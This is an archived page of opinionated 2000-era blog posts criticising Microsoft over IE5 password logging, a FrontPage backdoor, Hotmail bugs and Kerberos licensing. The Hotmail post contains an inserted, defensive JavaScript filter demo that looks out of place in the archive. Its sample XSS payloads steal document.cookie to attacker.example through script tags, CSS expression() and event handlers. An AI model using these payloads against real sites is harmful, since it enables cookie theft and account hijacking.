Archive 9

Even being the richest man in the world doesn't stop you from getting a pie in the face.

"But godliness with contentment is great gain."
1 Timothy 6:6 (NIV).

Danger - MS Programming

Posted 11 April 2000.

A guy named Noah Patton wrote to MacOS Rumors the following regarding MSIE5:

When I.E. 5 came out, I downloaded it and took a look. I decided it was nothing special, and promptly went back to Netscape 4.7.2 and Eudora 4.2.2. Today, I loaded IE back up and discovered that under Edit -> Preferences -> Network -> Site Passwords it has been keeping a complete list of every e-mail account I ever checked, complete with passwords in some cases, every FTP site I have ever logged into, again with passwords in some cases. Very Scary!

The worst part is that I never even used IE; I immediately went back to using Netscape and Eudora.

I am VERY unhappy to have discovered this log, and have already removed internet explorer 5. I have so far been unable to figure out how to turn off the logging system, and if I did I'm not sure I would trust that it was really turned off.

Mac OS Rumors claims to have received over a hundred such reports during the past week. My oft-repeated advice: Refuse to use any MS products.

MS Dorks At It Again

Posted 15 April 2000.

As concerns are being expressed at high levels that the way Microsoft is muscling in on streaming video closely resembles the way it worked the browser market, Microsoft's software is getting it in trouble. AGAIN.

Microsoft said its engineers included a secret back door including the phrase "Netscape engineers are weenies!" in Web site authoring software that could allow hackers to gain unauthorized access to potentially thousands of Web sites.

... Hackers knowing how to exploit the vulnerability could access any site using FrontPage 98 extensions, Microsoft said. FrontPage, a Web authoring and site management software package, requires that special software code--or extensions--be present on the Web site for all features to be available.


"This is a vulnerability because it allows an author on one Web site on a shared server to see anything on another server," said Steve Lipner, manager of Microsoft's Security Response Center.


Microsoft apparently has been shipping software with the vulnerability for several years, possibly since 1996. Because Microsoft provides FrontPage 98 free with Windows NT 4.0 Server, the software is widely used for hosting Web sites on the Internet and across corporate intranets.

... access to Web site management files and possibly credit card information and user passwords.

Although Microsoft is treating the problem "as a serious security risk," a spokeswoman downplayed its overall effect. "Very few people are still using FrontPage 98," she said. "Most people are using FrontPage 2000."

"Yeah, right!" is what my brother said when he read that. (In a world where more businesses use Windows 95 than 98.)


Mark Bowden, president of BugNet, which supplies software bug fixes, ... disagreed with Microsoft's contention that FrontPage 98 extensions are no longer widely used. "I've seen so many problems converting over to FrontPage 2000. It's not seamless," he said.

The password back door is potentially most devastating for companies that host commercial and consumer Web sites. Hosting providers typically apply FrontPage extensions individually to hundreds of thousands of Web sites, meaning the problem could be difficult to clean up.


Software code enabling the back door includes the phrase "Netscape engineers are weenies!"


"Microsoft has a really ugly situation on (its) hands," said Gartner Group analyst Michael Gartenberg. "This is a major, major issue for Microsoft because it's going to hurt their credibility at a time when they're straining from a credibility perspective."

I believe I've already given a specific warning against using FrontPage (as well as multiple warnings against using any MS products).

This Week's Security Scare

Posted 19 April 2000.

More from CNet:

Microsoft is battling a second security problem in Web management software used on hundreds of thousands of Web sites around the world.

As reported on Friday, Microsoft acknowledged that rogue software code containing the phrase "Netscape engineers are weenies!" was included in its Windows NT operating system and could open up Web sites to unauthorized access. The nearly five-year-old code also can be used to crash Web sites running FrontPage 98 server extensions, Microsoft has acknowledged.

Now, in a second security notice posted late Friday, Microsoft warned: "Shortly after publishing the bulletin, we learned of a new, separate vulnerability that significantly increases the threat to users of these products."

The new vulnerability potentially exposes hundreds of thousands of Web sites to denial-of-service attacks, whereby hackers could overrun the code with data and crash the sites. Because Microsoft distributes FrontPage 98 for free with the Windows NT 4 server, it is widely used by companies offering Web hosting services.

"We are treating this as a very serious problem, even though it is different than what we first thought," said Steve Lipner, manager of Microsoft's Security Response Center.


"For the past several years it's been apparent that Microsoft's security development and testing process has been way behind its ability to put out products," said John Pescatore, a security analyst with Gartner Group.

Hmmm. Now how do we spell it again? Aviod... afoid... AVOID all MS products.

Warning: New OS

Posted 19 April 2000.

The big monopoly of Microsoft has apparently withdrawn Windows CE and replaced it with something they call Pocket PC. Be warned, and avoid products with Pocket PC in them.

Microsoft spokesman:

"In hindsight, we realized that our software experience was too complex, and from a hardware standpoint maybe we didn't have as good designs."

Windows Us Again

Posted 19 April 2000.

From CNet:

Microsoft has decided to include software in its Windows Me operating system that will allow consumers to hook their PCs into networking software from two competitors after all, an about-face prompted by customer and industry complaints.

The Redmond, Wash.-based software giant last month decided not to incorporate a "networking client" for Novell and Banyan networking software in Windows Me, its upcoming operating system for home PC users. News of the decision prompted a rash of complaints. The company now has reversed itself and will put the software back into the OS.


Microsoft's argument was assailed by critics who claimed the distinction was artificial and would force small and home business users to upgrade to Windows 2000, which costs about $100 more. In addition, Microsoft's decision to leave its own proprietary networking client in Windows Me, while dropping support for its third-party competitors, raised questions about whether the move was motivated by competitive concerns.

"When users don't like the decisions Microsoft is making on their behalf, they do have ways of expressing their displeasure," said Michael Gartenberg, an analyst at Gartner Group, which first reported the move in a bulletin.


The development of Windows Me has been somewhat tumultuous. Originally envisioned as the consumer version of Windows NT, Microsoft dramatically scaled back its focus as part of a decision to extend Windows 98 into a family of products. The company will release a consumer version of Windows 2000 within the next five years, Microsoft has said.


"I'm not surprised Microsoft backed down," Gartenberg said. "They had everything to lose and nothing to gain by dropping it."

Disclaimer: PieGate is not believed to have been instrumental in this backdown.

Yet Another Hotmail Bug

Posted 3 May 2000.

There are many other large free email services that don't get in the news this often.

Microsoft has patched a Hotmail bug that left users of the Web-based email service vulnerable to a password-stealing trick.

The exploit was the latest in a series devised by bug hunters using JavaScript to launch fraudulent password entry screens to trick people into handing over control of their accounts.


In the example addressed by Hotmail this week, Bulgarian bug hunter Georgi Guninski demonstrated a way to inject JavaScript through a style tag. The exploit worked only with Microsoft's Internet Explorer browser.

Surprise, surprise.
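As an added illustration of the class of bug the CNet item describes (this is example code written for this page, not Hotmail's filter and not Guninski's actual exploit): a mail filter that only strips <script> blocks, compared with one that also refuses script smuggled in through styling. The sample messages and the attacker.example host are constructed for the example; that expression() values and javascript: URLs inside CSS would execute script is a property of IE-era browsers and is assumed here rather than taken from the page.

```javascript
// Added example (not Hotmail's code): a filter that only removes <script>
// versus one that also rejects script delivered through CSS and attributes.
// Assumption about the IE-era environment: CSS expression() and javascript:
// URLs inside url() execute script. Sample messages are constructed.

const SCRIPT_BLOCK = /<script\b[^>]*>[\s\S]*?<\/script\s*>/gi;
const QUOTED_VALUE = '("[^"]*"|\'[^\']*\'|[^\\s>]+)';

// The kind of filter that blocks the obvious vector and nothing else.
function naiveSanitize(html) {
  return html.replace(SCRIPT_BLOCK, '');
}

// Stricter filter: drop <style> blocks and style= attributes entirely, drop
// on* event handlers, and refuse URL-bearing attributes whose value carries
// a javascript: URL or a CSS expression(). Still regex-based and still not a
// complete HTML sanitizer; a real mail system should parse, not pattern-match.
function strictSanitize(html) {
  let out = html.replace(SCRIPT_BLOCK, '');
  out = out.replace(/<style\b[^>]*>[\s\S]*?<\/style\s*>/gi, '');
  out = out.replace(new RegExp('\\s+style\\s*=\\s*' + QUOTED_VALUE, 'gi'), '');
  out = out.replace(new RegExp('\\s+on\\w+\\s*=\\s*' + QUOTED_VALUE, 'gi'), '');
  out = out.replace(
    new RegExp('\\s+(href|src|background)\\s*=\\s*' + QUOTED_VALUE, 'gi'),
    (match, name, value) => {
      // Strip quotes and control/whitespace characters before checking, so
      // "java\tscript:" style tricks do not slip past the comparison.
      const v = value.replace(/^["']|["']$/g, '').replace(/[\s\x00-\x1f]/g, '').toLowerCase();
      return v.startsWith('javascript:') || v.includes('expression(') ? '' : match;
    }
  );
  return out;
}

// Rough oracle for the demo: does anything that would run script in an
// IE-era browser survive? Used only to compare the two filters.
function stillDangerous(html) {
  const lowered = html.replace(/[\s\x00-\x1f]/g, '').toLowerCase();
  return /<script/.test(lowered) ||
         /\bon\w+=/.test(lowered) ||
         lowered.includes('javascript:') ||
         lowered.includes('expression(');
}

// Constructed sample messages. The first is the vector the naive filter was
// written for; the others deliver the same cookie-stealing payload through
// styling or an event handler instead.
const SAMPLES = {
  scriptTag: '<p>hi</p><script>document.location="http://attacker.example/?"+document.cookie</script>',
  styleExpression: '<div style="width:expression(document.location=\'http://attacker.example/?\'+document.cookie)">hi</div>',
  styleImport: '<style>@import url(javascript:document.location="http://attacker.example/?"+document.cookie)</style><p>hi</p>',
  eventHandler: '<img src="x" onerror="document.location=\'http://attacker.example/?\'+document.cookie">',
};

// For each sample, report whether script survives each filter.
function compareFilters(samples = SAMPLES) {
  const report = {};
  for (const [name, html] of Object.entries(samples)) {
    report[name] = {
      naive: stillDangerous(naiveSanitize(html)),
      strict: stillDangerous(strictSanitize(html)),
    };
  }
  return report;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(compareFilters(), null, 2));
}
```

Run it with node and the report shows the naive filter stopping only the first sample while the style-based and event-handler samples still carry script; the strict filter clears all four. The lesson is the one Guninski's bug hunting kept making: anything the browser will treat as script is a script vector, and a filter written against one syntax will be bypassed through another.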

MS Hotmail Goof

Posted 3 May 2000.

Those who are still masochistic enough to use MS products, do pay special attention to just what you tell them when you sign up or register.

Microsoft's implementation of a new federal law protecting children's privacy has cost some Hotmail customers their accounts.

Some Hotmail members found themselves permanently shut out of their accounts after Microsoft enacted changes to comply with new regulations that mandate parental consent for Net users under the age of 13.

The Children's Online Privacy Protection Act (COPPA), a federal law that went into effect Friday, requires Web sites that collect personal information to get parental consent for visitors under the age of 13.

"With the solution in place, we're finding that a handful of Hotmail users residing in the U.S. incorrectly provided an age that was less than 13 when they created their Hotmail account," a Microsoft representative said.

Microsoft said it warned U.S. customers whose profiles indicated they were under 13 that they would need to provide parental consent to use Hotmail after April 21.

But one adult who lost an account claimed no memory of being warned by Hotmail.

"I have been a Hotmail user for several years now, and don't think I ever registered as a user 'under the age of 13," the Hotmail account holder wrote in an email interview. "But even if I had--who can remember? They should have given us better notice of how to work around/verify the info and warned us we would be permanently locked out."

Microsoft offered no hope for getting those accounts restored to their original registrants.

"These accounts cannot be reactivated because the users provided inaccurate information," the Microsoft representative said. "However, these users can create a new Hotmail account and provide the appropriate information which will comply with COPPA."

Emphasis added.

Court Quote

Posted 3 May 2000.

New York state Attorney General Eliot Spitzer:

"It is astonishing to me that Microsoft's two highest executives continue to ignore the case that the states' and federal governments have proved in court... And it is astonishing to me that they continue to present themselves as desiring to empower consumers, when their conduct shows a clear desire to restrict consumer choice and confine consumers only to those products that Microsoft wants to produce."

Cookie Jar Ajar

Posted 12 May 2000.

From the Who-Else-Has-Known-About-This? department:

If you're using Microsoft Internet Explorer running on Microsoft Windows, be aware that your cookie file is readable by any hostile website. Or, if you'd like to see the security hole in action, leave Javascript on and check it out: "Open Cookie Jar."

My Macintosh doesn't have any Microsoft software on it.

Open Source, But Not Open

Posted 12 May 2000.

Ted and Jeremy (Samba Boys):

Microsoft, after getting beat up in the press for making proprietary extensions to the Kerberos [security] protocol, has released the specifications on the web -- but in order to get it, you have to run a Windows .exe file which forces you to agree to a click-through license agreement where you agree to treat it as a trade secret, before it will give you the .pdf file. Who would have thought that you could publish a trade secret on the web?

The critical part of the license states:

b. The Specification is confidential information and a trade secret of Microsoft. Therefore, you may not disclose the Specification to anyone else (except as specifically allowed below), and you must take reasonable security precautions, at least as great as the precautions you take to protect your own confidential information, to keep the Specification confidential. If you are an entity, you may disclose the Specification to your full-time employees on a need to know basis, provided that you have executed appropriate written agreements with your employees sufficient to enable you to comply with the terms of this Agreement.

This of course is a very clever way to pretend to distribute the spec, whilst making it completely impossible to implement in competing implementations that implement their proprietary protocol extensions -- extensions to a protocol which was originally published by the Kerberos team as an Open Standard in the IETF. This completely defeats the IETF's interoperability goals, and helps Microsoft leverage their desktop monopoly into the server market.

The one good thing about Microsoft having pulled this dirty trick is that it makes their proprietary intentions about the Windows 2000 PDC clear as day. I doubt anyone else could come up with a charitable explanation for what they've done. What better example of Microsoft's "embrace, extend, and engulf" business model!

Jeremy Allison,
Samba Team.